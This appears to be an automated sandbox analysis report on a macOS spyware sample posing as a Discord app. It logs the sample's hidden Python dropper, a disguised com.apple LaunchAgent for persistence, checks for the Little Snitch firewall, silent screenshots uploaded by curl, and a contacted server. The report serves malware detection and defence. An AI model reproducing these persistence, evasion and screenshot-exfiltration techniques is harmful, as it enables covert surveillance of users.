Source: /usr/sbin/screencapture (PID: 621)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 628)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 630)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 637)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 639)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 646)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 649)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 655)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 662)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 664)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 671)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 678)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/system_profiler (PID: 570)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Reads user launchservices plist file containing default apps for corresponding file types
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Writes shell script file to disk with an unusual file extension
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Writes shell script file to disk with an unusual file extension: /Users/henry/.system/.systemkeeper
Executes the "awk" command used to scan for patterns (typically in standard output)
Source: /bin/bash (PID: 569)Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }
Reads data from the local random generator
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 584)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 587)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 594)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 599)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 605)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 612)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 614)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 621)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 628)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 630)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 637)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 639)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 646)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 649)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 655)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 662)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 664)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 671)Random device file read: /dev/urandom
Source: /usr/sbin/screencapture (PID: 678)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 598)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 607)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 616)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 623)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 632)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 641)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 648)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 657)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 666)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 673)Random device file read: /dev/urandom
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Uses the Python framework
Source: /usr/bin/python (PID: 566)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 575)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 589)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 598)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 607)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 616)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 623)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 632)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 641)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 648)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 657)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 666)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 673)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to disk
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)XML plist file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist

Boot Survival:

Creates memory-persistent launch services
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist
Creates user-wide 'launchd' managed services aka launch agents
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Launch agent created file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist

Hooking and other Techniques for Hiding and Protection:

Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentions
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Launch agent created file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist
Executes the "base64" command used to encode or decode data (e.g. files, payloads)
Source: /bin/bash (PID: 565)Base64 executable: /usr/bin/base64 -> base64 -D

Malware Analysis System Evasion:

Reads the sysctl hardware model value (may be used for detecting VM presence)
Source: /usr/sbin/system_profiler (PID: 570)Sysctl read request: hw.model (6.2)

HIPS / PFW / Operating System Protection Evasion:

Checks if the firewall "Little Snitch" is running
Source: /bin/sh (PID: 580)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 582)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 592)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 602)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 610)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 619)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 626)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 635)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 644)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 652)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 660)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 669)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 676)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch

Language, Device and Operating System Detection:

Reads process information of other processes
Reads hardware related sysctl values
Source: /usr/sbin/system_profiler (PID: 570)Sysctl read request: hw.cpu_freq (6.15)
Source: /usr/sbin/system_profiler (PID: 570)Sysctl read request: hw.memsize (6.24)
Reads the systems hostname
Source: /bin/bash (PID: 563)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 572)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 573)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 574)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 576)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 577)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 600)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 608)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 617)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 633)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 642)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 650)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 658)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 667)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 674)Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 598) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 607) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 616) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 623) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 632) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 641) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 648) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 657) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 666) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 673) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

[Figure: behavior graph. Behavior Graph ID: 65585; Sample: Pe7niErK6B; Startdate: 12/12/2018; Architecture: MAC; Score: 76]

DNS/IP Info:

  • 37.1.221.204, 80, 8080, LEASEWEB-DE, Ukraine
  • 17.253.57.212, 49242, 80, APPLE-AUSTIN-AppleIncUS, United States

Dropped files:

  • /Users/henry/Libra....systemkeeper.plist, XML
  • /Users/henry/.system/.systemkeeper, python

Signatures:

  • Detected macOS LamePyre spyware
  • Detected TCP or UDP traffic on non-standard ports
  • Checks if the firewall "Little Snitch" is running
  • Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)
  • Uploads files by using the "curl" command and emulating a filled-in form
  • Explicitly creates screenshots silently (i.e. without playing sounds)
  • Captures screenshots with shell command 'screencapture'
  • Reads process information of other processes

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches


Startup

  • system is mac1
  • xpcproxy (PID: 561 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • Application Stub (PID: 561 PPID: 1 Overlayed Process Image: xpcproxy MD5: 9c5867b717c3b80c525f4038ff075186)
    • bash (PID: 563 PPID: 561 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 564 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 565 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • base64 (PID: 565 PPID: 563 Overlayed Process Image: bash MD5: 718fe34e4012999c180f807fe323e7f1)
      • bash (PID: 566 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • python (PID: 566 PPID: 563 Overlayed Process Image: bash MD5: 2464fd41f7cf319d0e5c61a7643af77e)
      • Python (PID: 566 PPID: 563 Overlayed Process Image: python MD5: ba780ab677147d9db60c564ef3f51dd0)
        • Python (PID: 572 PPID: 566 MD5: ba780ab677147d9db60c564ef3f51dd0)
        • sh (PID: 572 PPID: 566 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
        • mkdir (PID: 572 PPID: 566 Overlayed Process Image: sh MD5: 135a3b94b3d9efccb4c8cd23ac404571)
        • Python (PID: 573 PPID: 566 MD5: ba780ab677147d9db60c564ef3f51dd0)
        • sh (PID: 573 PPID: 566 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
        • mkdir (PID: 573 PPID: 566 Overlayed Process Image: sh MD5: 135a3b94b3d9efccb4c8cd23ac404571)
        • Python (PID: 574 PPID: 566 MD5: ba780ab677147d9db60c564ef3f51dd0)
        • sh (PID: 574 PPID: 566 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
        • launchctl (PID: 574 PPID: 566 Overlayed Process Image: sh MD5: 17fad4b994d600d0a5b6bc02b55c2c80)
        • Python (PID: 576 PPID: 566 MD5: ba780ab677147d9db60c564ef3f51dd0)
        • sh (PID: 576 PPID: 566 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
          • sh (PID: 578 PPID: 576 MD5: 8aa60b22a5d30418a002b340989384dc)
          • ps (PID: 578 PPID: 576 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
          • sh (PID: 580 PPID: 576 MD5: 8aa60b22a5d30418a002b340989384dc)
          • grep (PID: 580 PPID: 576 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
          • sh (PID: 581 PPID: 576 MD5: 8aa60b22a5d30418a002b340989384dc)
          • grep (PID: 581 PPID: 576 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • bash (PID: 567 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 584 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 584 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 586 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 586 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 587 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 587 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 588 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 588 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 594 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 594 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 595 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 595 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 599 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 599 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 604 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 604 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 605 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 605 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 606 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 606 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 612 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 612 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 613 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 613 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 614 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 614 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 615 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 615 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 621 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 621 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 622 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 622 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 628 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 628 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 629 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 629 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 630 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 630 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 631 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 631 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 637 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 637 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 638 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 638 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 639 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 639 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 640 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 640 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 646 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 646 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 647 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 647 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 649 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 649 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 654 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 654 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 655 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 655 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 656 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 656 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 662 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 662 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 663 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 663 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 664 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 664 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 665 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 665 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 671 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 671 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 672 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 672 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 678 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 678 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 679 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 679 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
  • bash (PID: 568 PPID: 567 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
  • system_profiler (PID: 568 PPID: 567 Overlayed Process Image: bash MD5: 28bae8e36d2b8a65b50a54ee327298b8)
  • bash (PID: 569 PPID: 567 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
  • awk (PID: 569 PPID: 567 Overlayed Process Image: bash MD5: fa9db7f6c4a0287ceb78a3bd34524ada)
  • xpcproxy (PID: 575 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 575 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 575 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 577 PPID: 575 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 577 PPID: 575 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 579 PPID: 577 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 579 PPID: 577 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 582 PPID: 577 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 582 PPID: 577 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 583 PPID: 577 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 583 PPID: 577 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 589 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 589 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 589 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 590 PPID: 589 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 590 PPID: 589 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 591 PPID: 590 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 591 PPID: 590 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 592 PPID: 590 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 592 PPID: 590 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 593 PPID: 590 MD5: 8aa60b22a5d30418a002b340989384dc)
